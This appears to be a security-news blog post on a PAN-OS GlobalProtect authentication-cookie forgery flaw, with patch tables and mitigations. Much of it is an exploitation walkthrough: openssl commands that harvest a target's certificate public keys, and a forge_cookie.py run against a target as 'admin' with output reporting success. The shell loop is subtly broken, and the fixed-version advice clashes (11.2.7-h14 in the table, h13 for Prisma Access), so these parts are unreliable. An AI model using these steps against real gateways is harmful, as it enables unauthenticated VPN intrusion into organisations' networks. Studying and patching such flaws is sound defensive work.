Listen to this Post
The vulnerability resides in the GlobalProtect authentication override feature of PAN-OS. When enabled, this feature issues a cookie to authenticated users that serves as a bearer token so they don’t have to re‑enter credentials for subsequent VPN sessions.
Under normal operation, the PAN‑OS gateway receives the cookie, base64‑decodes it, and decrypts the string using a configured private key. The decrypted content is then trusted without any signature verification or cryptographic integrity check – a classic CWE‑565 weakness.
The flaw becomes exploitable when the same certificate is reused for both the HTTPS service (which exposes its public key during the TLS handshake) and the authentication override cookie encryption/decryption. Because the private key is used for decryption but no signature validation occurs after decryption, an attacker who possesses the corresponding public key can forge arbitrary authentication cookies containing any username.
The exploitation process is:
- Retrieve the certificate chain from the target’s GlobalProtect portal/gateway HTTPS service.
- Iterate through each certificate and extract its public key.
- Encrypt a forged authentication cookie with each public key.
- Submit the forged cookies to the `/ssl-vpn/login.esp` endpoint.
- If the appliance’s cookie‑decryption private key matches the public key used to encrypt the cookie, the decrypted content is accepted as valid, granting unauthorized VPN access.
The entire attack is unauthenticated, requires no user interaction, and can be performed in a single HTTP request.
DailyCVE Form:
Platform: Palo Alto PAN-OS
Version: 10.2,11.1,11.2,12.1
Vulnerability : Auth Cookie Forgery
Severity: CVSS 7.8 High
date: 2026-05-13
Prediction: 2026-06-01 (CISA KEV deadline)
What Undercode Say: Analytics
Retrieve certificate chain from the target GlobalProtect gateway openssl s_client -connect vpn.target.com:443 -showcerts </dev/null 2>/dev/null | \ openssl x509 -outform PEM > gateway_chain.pem Extract all public keys from the chain for cert in $(awk '/BEGIN CERT/,/END CERT/' gateway_chain.pem); do openssl x509 -in "$cert" -pubkey -noout > "pubkey_$(openssl x509 -in "$cert" -noout -hash).pem" done Forge an authentication override cookie using the public key (Using a known PoC script) python3 forge_cookie.py --target vpn.target.com --port 443 --user admin --verbose
Observed attacker infrastructure
- Wave 1 (May 17‑18, 2026): Vultr‑hosted IPs
- Wave 2 (May 21, 2026): Dromatics Systems IPs
Both waves used a consistent spoofed MAC address and targeted the local administrator account with forged cookies. In the second wave, attackers successfully obtained VPN IP assignments and gained direct internal network access.
Exploit
No authentication is required. The attacker only needs:
1. A reachable GlobalProtect portal/gateway
2. The feature “authentication override cookies” enabled
- The cookie‑encryption certificate reused with the HTTPS service
The public key is obtained from the server’s own TLS certificate chain. The attacker then crafts a cookie containing arbitrary user data (e.g.,user=admin), encrypts it with that public key, and submits it to the gateway. Because the gateway uses the corresponding private key to decrypt and trusts the result without any signature check, the forged cookie is accepted.
Example PoC command (from Rapid7 researcher)
python forge_cookie.py --target 192.168.86.99 --user admin [] Retrieving certificate chain from 192.168.86.99:443 ... Found 2 certificate(s) in chain: [bash] CN=192.168.86.99 (RSA 2048 bits, CA=False) [bash] CN=GP-Lab-CA (RSA 2048 bits, CA=True) [] Forging cookie for user 'admin', testing each key Trying [bash] CN=192.168.86.99 [-] Failure - Gateway did not accept the forged cookie Trying [bash] CN=GP-Lab-CA [+] Success - Gateway accepted the forged cookie
The script then outputs the forged cookie value that can be used in subsequent VPN requests.
Protection
Immediate remediation (patch)
Apply any of the following fixed PAN‑OS versions:
| Branch | Fixed version |
|–|-|
| 12.1 | 12.1.4‑h6 / 12.1.7 |
| 11.2 | 11.2.4‑h17 / 11.2.7‑h14 / 11.2.10‑h7 / 11.2.12 |
| 11.1 | 11.1.4‑h33 / 11.1.6‑h32 / 11.1.7‑h6 / 11.1.10‑h25 / 11.1.13‑h5 / 11.1.15 |
| 10.2 | 10.2.7‑h34 / 10.2.10‑h36 / 10.2.13‑h21 / 10.2.16‑h7 / 10.2.18‑h6 |
Prisma Access customers should upgrade to 10.2.10‑h36 or 11.2.7‑h13.
Temporary mitigations (if patching is impossible)
- Disable authentication override in GlobalProtect portal and gateway configurations
- Generate a new, dedicated certificate for authentication override cookies – do not reuse the certificate with any other service (e.g., HTTPS management interface)
Palo Alto Networks has confirmed that devices without authentication override enabled are not vulnerable.
Impact
- Authentication bypass allowing remote, unauthenticated attackers to establish a VPN connection as any user (including the local administrator)
- Direct internal network access once the gateway assigns a VPN IP address to the forged session
- Observed exploitation in two waves (mid‑May 2026) targeting multiple organisations; CISA added CVE‑2026‑0257 to its Known Exploited Vulnerabilities catalog with a patch deadline of June 1, 2026
- No lateral movement was detected in the analysed incidents, but the vulnerability provides a foothold from which further attacks can be launched
CVSS v4.0 score: 7.8 (High) – but treat as critical on edge‑facing VPN appliances.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: www.cve.org
Extra Source Hub:
Undercode
